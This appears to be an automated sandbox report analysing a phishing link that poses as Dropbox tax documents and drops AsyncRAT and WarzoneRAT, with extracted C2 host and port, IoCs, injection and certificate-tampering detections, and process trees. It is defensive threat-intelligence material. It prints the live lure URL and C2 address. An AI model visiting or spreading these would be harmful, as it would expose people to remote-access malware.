asyncrat | hxxps://dropbox-files[.]app[.]link/Tax_documents

Analysis

max time kernel
184s
max time network
210s
platform
windows10_x64
resource
win10-20220331-en
submitted
04-04-2022 20:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://dropbox-files.app.link/Tax_documents

Score

10^/10

asyncrat warzonerat infostealer rat suricata

Malware Config

Extracted

Family

warzonerat

mobibanewdan.duckdns.org:786

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4120 4024 wscript.exe
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
suricata

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	4024	wscript.exe

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
C:\ProgramData\hahahha.sdasd~txt	asyncrat
C:\ProgramData\hahahha.sdasd~txt	asyncrat
behavioral2/memory/2856-408-0x00000000001C0000-0x0000000000214000-memory.dmp	asyncrat

Warzone RAT Payload 7 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/752-370-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/752-371-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/752-376-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/3936-377-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/3392-383-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/5012-389-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/1372-395-0x0000000000405CE2-mapping.dmp	warzonerat

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

ddond.comESETNONU.comhahahha.sdasd~txt

pid process

3856 ddond.com
3880 ESETNONU.com
2856 hahahha.sdasd~txt

pid	process
3856	ddond.com
3880	ESETNONU.com
2856	hahahha.sdasd~txt

Suspicious use of SetThreadContext 5 IoCs

Processes:

ESETNONU.com

description	pid	process	target process
PID 3880 set thread context of 752	3880	ESETNONU.com	aspnet_regbrowsers.exe
PID 3880 set thread context of 3936	3880	ESETNONU.com	aspnet_regbrowsers.exe
PID 3880 set thread context of 3392	3880	ESETNONU.com	aspnet_regbrowsers.exe
PID 3880 set thread context of 5012	3880	ESETNONU.com	aspnet_regbrowsers.exe
PID 3880 set thread context of 1372	3880	ESETNONU.com	aspnet_regbrowsers.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2172	752	WerFault.exe	aspnet_regbrowsers.exe
2196	3936	WerFault.exe	aspnet_regbrowsers.exe
428	3392	WerFault.exe	aspnet_regbrowsers.exe
1932	5012	WerFault.exe	aspnet_regbrowsers.exe

Checks processor information in registry 2 TTPs 17 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exeWINWORD.EXEEXCEL.EXEEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2816 schtasks.exe

pid	process
2816	schtasks.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEEXCEL.EXEWINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1572 taskkill.exe
1980 taskkill.exe
4300 taskkill.exe
Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2768928936-1532084270-2243561071-1000_Classes\Local Settings firefox.exe

pid	process
1572	taskkill.exe
1980	taskkill.exe
4300	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2768928936-1532084270-2243561071-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

ddond.comESETNONU.com

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	ddond.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	ddond.com
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	ESETNONU.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	ESETNONU.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	ESETNONU.com

NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\Tax_Documents.docx:Zone.Identifier firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\Tax_Documents.docx:Zone.Identifier	firefox.exe

Office document contains embedded OLE objects 1 IoCs

Detected embedded OLE objects in Office documents.

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Tax_Documents.docx	office_ole_embedded

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4264 WINWORD.EXE
4264 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

ESETNONU.com

pid process

3880 ESETNONU.com
3880 ESETNONU.com
3880 ESETNONU.com
3880 ESETNONU.com
3880 ESETNONU.com
3880 ESETNONU.com

pid	process
4264	WINWORD.EXE
4264	WINWORD.EXE

pid	process
3880	ESETNONU.com
3880	ESETNONU.com
3880	ESETNONU.com
3880	ESETNONU.com
3880	ESETNONU.com
3880	ESETNONU.com

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

firefox.exetaskkill.exeESETNONU.comtaskkill.exetaskkill.exehahahha.sdasd~txt

description	pid	process
Token: SeDebugPrivilege	2748	firefox.exe
Token: SeDebugPrivilege	2748	firefox.exe
Token: SeDebugPrivilege	2748	firefox.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	3880	ESETNONU.com
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	2856	hahahha.sdasd~txt
Token: SeDebugPrivilege	2748	firefox.exe
Token: SeDebugPrivilege	2748	firefox.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

firefox.exe

pid process

2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

firefox.exe

pid process

2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
2748 firefox.exe
2748 firefox.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

firefox.exeWINWORD.EXEEXCEL.EXEEXCEL.EXE

pid	process
2748	firefox.exe
2748	firefox.exe
2748	firefox.exe
2748	firefox.exe
4264	WINWORD.EXE
4264	WINWORD.EXE
4264	WINWORD.EXE
4264	WINWORD.EXE
4264	WINWORD.EXE
4264	WINWORD.EXE
5012	EXCEL.EXE
5012	EXCEL.EXE
5012	EXCEL.EXE
5012	EXCEL.EXE
5012	EXCEL.EXE
5012	EXCEL.EXE
1236	EXCEL.EXE
1236	EXCEL.EXE
1236	EXCEL.EXE
1236	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exefirefox.exe

description	pid	process	target process
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2644 wrote to memory of 2748	2644	firefox.exe	firefox.exe
PID 2748 wrote to memory of 2112	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 2112	2748	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 4784 wrote to memory of 5012	4784	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 5040	2748	firefox.exe	firefox.exe
PID 2748 wrote to memory of 4108	2748	firefox.exe	firefox.exe

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://dropbox-files.app.link/Tax_documents
1⤵
- Suspicious use of WriteProcessMemory
PID:2644

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://dropbox-files.app.link/Tax_documents
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2748

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2748.0.55670659\933093013" -parentBuildID 20200403170909 -prefsHandle 1532 -prefMapHandle 1524 -prefsLen 1 -prefMapSize 220055 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2748 "\\.\pipe\gecko-crash-server-pipe.2748" 1612 gpu
3⤵
PID:2112

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2748.1.1014547707\438174884" -childID 1 -isForBrowser -prefsHandle 2160 -prefMapHandle 2156 -prefsLen 122 -prefMapSize 220055 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2748 "\\.\pipe\gecko-crash-server-pipe.2748" 2172 tab
3⤵
PID:5040

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2748.13.226961045\1275965387" -childID 2 -isForBrowser -prefsHandle 3204 -prefMapHandle 3500 -prefsLen 6904 -prefMapSize 220055 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2748 "\\.\pipe\gecko-crash-server-pipe.2748" 3520 tab
3⤵
PID:4108

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4784

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
PID:5012

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
